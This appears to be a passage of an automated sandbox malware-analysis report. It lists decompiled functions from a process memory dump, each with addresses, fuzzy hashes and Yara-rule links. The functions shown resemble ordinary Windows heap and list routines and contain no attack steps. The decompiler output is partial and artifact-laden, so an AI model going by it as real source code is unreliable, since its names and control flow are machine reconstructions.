                                                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction Fuzzy Hash: ED2104716016808FEB199B69C948B7577E8EF09348F1904E1DD468B392EBB8FC40DA90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC7794, Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E04BC7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4c37b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04B8F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04B67D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04B89AE0();
					_t24 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                    0x04bc7799
                                                    0x04bc779a
                                                    0x04bc779b
                                                    0x04bc77a3
                                                    0x04bc77ab
                                                    0x04bc77ae
                                                    0x04bc77b1
                                                    0x04bc77b1
                                                    0x04bc77bf
                                                    0x04bc77c4
                                                    0x04bc77c8
                                                    0x04bc77ce
                                                    0x04bc77d4
                                                    0x04bc77e0
                                                    0x04bc77e0
                                                    0x04bc77d6
                                                    0x04bc77d6
                                                    0x04bc77de
                                                    0x00000000
                                                    0x00000000
                                                    0x04bc77de
                                                    0x04bc77e5
                                                    0x04bc77f0
                                                    0x04bc77f3
                                                    0x04bc77f6
                                                    0x04bc77fd
                                                    0x04bc7800
                                                    0x04bc780c
                                                    0x04bc7818
                                                    0x04bc782b
                                                    0x04bc781a
                                                    0x04bc7823
                                                    0x04bc7823
                                                    0x04bc7830
                                                    0x04bc7831
                                                    0x04bc7838
                                                    0x04bc783d
                                                    0x04bc783e
                                                    0x04bc784f
                                                    0x04bc784f
                                                    0x04bc785a

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54191fa4ae02d7c13427870c87b2321cc0530287664558e72172a9147265cf65
                                                    • Instruction ID: b29f11dde4bb69cdd73766850023bab6e6b2f03930aaa3f150b91f7d8e51e3eb
                                                    • Opcode Fuzzy Hash: 54191fa4ae02d7c13427870c87b2321cc0530287664558e72172a9147265cf65
                                                    • Instruction Fuzzy Hash: 60219072900A04AFD725DF69DC90E6BB7B9EF48744F1045AEF60AD7750EA34E900CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7FD9B, Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E04B7FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04B576E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                    0x04b7fd9b
                                                    0x04b7fda0
                                                    0x04b7fda1
                                                    0x04b7fdab
                                                    0x04b7fdad
                                                    0x04b7fdb0
                                                    0x04b7fdb8
                                                    0x04b7fe0f
                                                    0x04b7fde6
                                                    0x04b7fde9
                                                    0x04b7fdec
                                                    0x04bbc0c0
                                                    0x04b7fdfe
                                                    0x04b7fe06
                                                    0x04b7fe06
                                                    0x04bbc0c8
                                                    0x04b7fe2d
                                                    0x04b7fe2d
                                                    0x00000000
                                                    0x04b7fe2d
                                                    0x04bbc0d1
                                                    0x04bbc0e0
                                                    0x04bbc0e5
                                                    0x04bbc0e5
                                                    0x04bbc0e8
                                                    0x00000000
                                                    0x04bbc0e8
                                                    0x04b7fdf4
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7fdf6
                                                    0x04b7fdfa
                                                    0x04b7fe1a
                                                    0x04b7fe1f
                                                    0x04b7fe1f
                                                    0x04b7fdfc
                                                    0x00000000
                                                    0x04b7fdfc
                                                    0x04b7fdcc
                                                    0x04b7fdd0
                                                    0x04b7fe26
                                                    0x00000000
                                                    0x04b7fe26
                                                    0x04b7fdd8
                                                    0x04b7fddb
                                                    0x04b7fddd
                                                    0x04b7fde0
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction ID: d65cf5d6444b8949b5fb72a45f0f77187db0f5cfc4ec7bc58b045e6723cb35a9
                                                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction Fuzzy Hash: 30216872A00A40DBD731CF49C540A76B7E5EB98B10F2485AEE96987610E734AD00EB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B49240, Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E04B49240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4c1f708);
				E04B9D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04B895D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04B895D0();
				_t33 =  *0x4c384c4; // 0x0
				L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4c384c4; // 0x0
				L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4c384c4; // 0x0
				E04B62280(L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4c386b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04B895D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04B895D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04B49325();
					_t50 =  *0x4c384c4; // 0x0
					return E04B9D0D1(L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                    0x04b49240
                                                    0x04b49242
                                                    0x04b49247
                                                    0x04b4924c
                                                    0x04b4924e
                                                    0x04b49255
                                                    0x04b49257
                                                    0x04b4925a
                                                    0x04b4925f
                                                    0x04b4925f
                                                    0x04b49266
                                                    0x04b49271
                                                    0x04b49276
                                                    0x04b49279
                                                    0x04b4927e
                                                    0x04b49295
                                                    0x04b4929a
                                                    0x04b492b1
                                                    0x04b492b6
                                                    0x04b492d7
                                                    0x04b492dc
                                                    0x04b492e0
                                                    0x04b492e6
                                                    0x04b492e8
                                                    0x04b492ee
                                                    0x04b49332
                                                    0x04b49333
                                                    0x04b49337
                                                    0x04b49338
                                                    0x04b4933a
                                                    0x04b4933a
                                                    0x04b4933d
                                                    0x04b49342
                                                    0x04b49342
                                                    0x04b49345
                                                    0x04b49349
                                                    0x04b4934e
                                                    0x04b49352
                                                    0x04b49357
                                                    0x04b492f4
                                                    0x04b492f4
                                                    0x04b492f6
                                                    0x04b492f9
                                                    0x04b49300
                                                    0x04b49306
                                                    0x04b49324
                                                    0x04b49324

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2c13cf61a64aa9926087b33085841867a137c10ed9f6dcc90a932bc788dcd3af
                                                    • Instruction ID: 82f513368cda70f265415021c6adcbd575a7b5531f5955b9ddc5fc36d9ff35b2
                                                    • Opcode Fuzzy Hash: 2c13cf61a64aa9926087b33085841867a137c10ed9f6dcc90a932bc788dcd3af
                                                    • Instruction Fuzzy Hash: AE212872151600EFD721FF28CA50F5AB7F9FF08708F1445A8A04A87AA1CB38F941DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7B390, Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E04B7B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04B62280(_t12, 0x4c38608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04B800C2(0x4c38608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                    0x04b7b395
                                                    0x04b7b3a2
                                                    0x04b7b3a5
                                                    0x04b7b3aa
                                                    0x04b7b3b2
                                                    0x04b7b3ba
                                                    0x04b7b3bd
                                                    0x04b7b3c0
                                                    0x04b7b3c4
                                                    0x04b7b3c9
                                                    0x04bba3e9
                                                    0x04bba3ed
                                                    0x04bba3f0
                                                    0x04bba3ff
                                                    0x04bba403
                                                    0x04bba409
                                                    0x00000000
                                                    0x00000000
                                                    0x04bba40b
                                                    0x04bba40b
                                                    0x04bba40f
                                                    0x04bba415
                                                    0x04bba423
                                                    0x04bba423
                                                    0x04bba415
                                                    0x04b7b3d1
                                                    0x04b7b3e8
                                                    0x04b7b3e8
                                                    0x04b7b3d9

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6113c107b6dbf8fa820baf14978ea2a08c00ae1c951d645b9cffdae10dba51c3
                                                    • Instruction ID: d642f360bc7a6c8b1bc09676545f37df929aa31b3706ccc4dc01e0213a30f11c
                                                    • Opcode Fuzzy Hash: 6113c107b6dbf8fa820baf14978ea2a08c00ae1c951d645b9cffdae10dba51c3
                                                    • Instruction Fuzzy Hash: 80116F737091105FDB189E148D4197B72A7EBC5334B2501ADED16D73C0D935BC01C6D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BD4257, Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E04BD4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4c208d0);
				E04B9D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04BD41E8(__ebx, __edi, __ecx, _t39);
				E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4c387e4;
					_t18 =  *0x4c387e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4c35cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4c387e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4c387e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04B47055(_t31 + 0xfffffff8);
								_t24 =  *0x4c387e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4c387e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4c35cd0;
				if( *0x4c35cd0 <= 0) {
					L04B47055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4c387e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4c387e8 = _t30;
						 *0x4c387e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04B9D0D1(L04BD4320());
			}















                                                    0x04bd4257
                                                    0x04bd4257
                                                    0x04bd4257
                                                    0x04bd4259
                                                    0x04bd425e
                                                    0x04bd4263
                                                    0x04bd4265
                                                    0x04bd4273
                                                    0x04bd4278
                                                    0x04bd427c
                                                    0x04bd427f
                                                    0x04bd4281
                                                    0x04bd4287
                                                    0x04bd42d7
                                                    0x04bd42d7
                                                    0x04bd42da
                                                    0x04bd428d
                                                    0x04bd428d
                                                    0x04bd428f
                                                    0x04bd4292
                                                    0x04bd4297
                                                    0x04bd429c
                                                    0x04bd42a0
                                                    0x04bd42a6
                                                    0x04bd42a8
                                                    0x04bd42ae
                                                    0x04bd42b3
                                                    0x00000000
                                                    0x04bd42ba
                                                    0x04bd42ba
                                                    0x04bd42bf
                                                    0x04bd42c5
                                                    0x04bd42ca
                                                    0x04bd42cf
                                                    0x04bd42d0
                                                    0x00000000
                                                    0x04bd42d0
                                                    0x04bd42b3
                                                    0x00000000
                                                    0x04bd42a6
                                                    0x04bd429c
                                                    0x04bd42dc
                                                    0x04bd42dc
                                                    0x04bd42e3
                                                    0x04bd4309
                                                    0x04bd42e5
                                                    0x04bd42e5
                                                    0x04bd42e8
                                                    0x04bd42ee
                                                    0x04bd42f0
                                                    0x00000000
                                                    0x04bd42f2
                                                    0x04bd42f2
                                                    0x04bd42f4
                                                    0x04bd42f7
                                                    0x04bd42f9
                                                    0x04bd4300
                                                    0x04bd4300
                                                    0x04bd42f0
                                                    0x04bd430e
                                                    0x04bd431f

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db7b0bbf81d6cb9716c330c09dcf59fe5b61edc6832660dea2e0cc515aca9ad0
                                                    • Instruction ID: 57d21c7cdaf129cddbdf5db339ce8b7d9c2c259cb5f4351184b81f84d8ee1667
                                                    • Opcode Fuzzy Hash: db7b0bbf81d6cb9716c330c09dcf59fe5b61edc6832660dea2e0cc515aca9ad0
                                                    • Instruction Fuzzy Hash: 1D215E74511601DFDB15EF65D140714B7F2FB8631AB1082EEE1198B250EB35F942CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC46A7, Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E04BC46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04B8F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04B7D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04B677F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                    0x04bc46b7
                                                    0x04bc46ba
                                                    0x04bc46c5
                                                    0x04bc46c8
                                                    0x04bc46d0
                                                    0x04bc46d4
                                                    0x04bc46e6
                                                    0x04bc46e9
                                                    0x04bc46f4
                                                    0x04bc46ff
                                                    0x04bc4705
                                                    0x04bc4706
                                                    0x04bc470c
                                                    0x04bc4713
                                                    0x04bc471b
                                                    0x04bc4723
                                                    0x04bc4725
                                                    0x04bc46d6
                                                    0x04bc46d9
                                                    0x04bc46db
                                                    0x04bc46db
                                                    0x04bc4732

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction ID: 934dcc67b91e324f9393fc446cebc58bb934e6be6654eba3a1d0531af7092b37
                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction Fuzzy Hash: EF11E572504208BBDB159F5CD8808BEBBB9EF95304F1080AEF945C7350DA359E55D7A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B72397, Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 34%
                                                    			E04B72397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4c3848c != 0) {
					L04B6FAD0(0x4c38610);
					if( *0x4c3848c == 0) {
						E04B6FA00(0x4c38610, _t19, _t27, 0x4c38610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04B72581(0x4c38610, 0x4b250a0, _t26, _t27, _t28);
						E04B6FA00(0x4c38610, 0x4b250a0, _t27, 0x4c38610);
					}
				} else {
					L1:
					_t11 =  *0x4c38614; // 0x1
					if(_t11 == 0) {
						_t11 = E04B84886(0x4b21088, 1, 0x4c38614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04B72581(0x4c38610, (_t11 << 4) + 0x4b25070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                    0x04b723b0
                                                    0x04b723b6
                                                    0x04b72409
                                                    0x04b72415
                                                    0x04bb5ae9
                                                    0x00000000
                                                    0x04b7241b
                                                    0x04b7241b
                                                    0x04b7241d
                                                    0x04b72427
                                                    0x04b7242e
                                                    0x04b72430
                                                    0x04b72430
                                                    0x04b723b8
                                                    0x04b723b8
                                                    0x04b723b8
                                                    0x04b723bf
                                                    0x04b723fc
                                                    0x04b723fc
                                                    0x04b723c1
                                                    0x04b723c3
                                                    0x04b723d0
                                                    0x04b723d8
                                                    0x04b723d8
                                                    0x04b723dc
                                                    0x04b723de
                                                    0x04b723e1
                                                    0x04b723e1
                                                    0x04b723ec

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce2886ed46190ae42649249525218db7063969584dcfe7510fe80ec49e585453
                                                    • Instruction ID: 77245dce04ce49cb4fc0de9e4b6c68f6988619870e12dd6513c191f3244c2024
                                                    • Opcode Fuzzy Hash: ce2886ed46190ae42649249525218db7063969584dcfe7510fe80ec49e585453
                                                    • Instruction Fuzzy Hash: 05114E327007106BF334AA39AC40F26B2EDEB50719F1544E6F616B7280D5B4F84187A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4C962, Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 42%
                                                    			E04B4C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4c3d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04B5EEF0(0x4c370a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04BCF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04B5EB70(_t29, 0x4c370a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04B8B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04BCF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4c370c0; // 0x0
					while(_t38 != 0x4c370c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4c3b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                    0x04b4c96a
                                                    0x04b4c974
                                                    0x04b4c988
                                                    0x04b4c98a
                                                    0x04bb7c9d
                                                    0x04bb7c9f
                                                    0x04bb7ca4
                                                    0x04bb7cae
                                                    0x04bb7cf0
                                                    0x04bb7cf5
                                                    0x04bb7cfa
                                                    0x04b4c992
                                                    0x04b4c996
                                                    0x04b4c997
                                                    0x04b4c998
                                                    0x04b4c9a3
                                                    0x04b4c9a3
                                                    0x04bb7cb0
                                                    0x04bb7cb7
                                                    0x04bb7cbb
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7cbd
                                                    0x04bb7ce8
                                                    0x04bb7cc5
                                                    0x04bb7cc8
                                                    0x04bb7cca
                                                    0x04bb7cd0
                                                    0x04bb7cd6
                                                    0x04bb7cde
                                                    0x04bb7ce4
                                                    0x04bb7ce4
                                                    0x04bb7cd0
                                                    0x00000000
                                                    0x04bb7ce8
                                                    0x04b4c990
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e2b25b0b106daf7e7b92171fbed8e612c0546a2bedb7e7d7de12a2f880c9a7d
                                                    • Instruction ID: 0e3843a9116c59648953e56faf20e6994a8803746c1889d2fe3d8fe720878fb2
                                                    • Opcode Fuzzy Hash: 0e2b25b0b106daf7e7b92171fbed8e612c0546a2bedb7e7d7de12a2f880c9a7d
                                                    • Instruction Fuzzy Hash: 3611CE313006069BDB52AF68D985ABAB7A6FBC4615B0005BDF88197660EFA0FD14CBD1
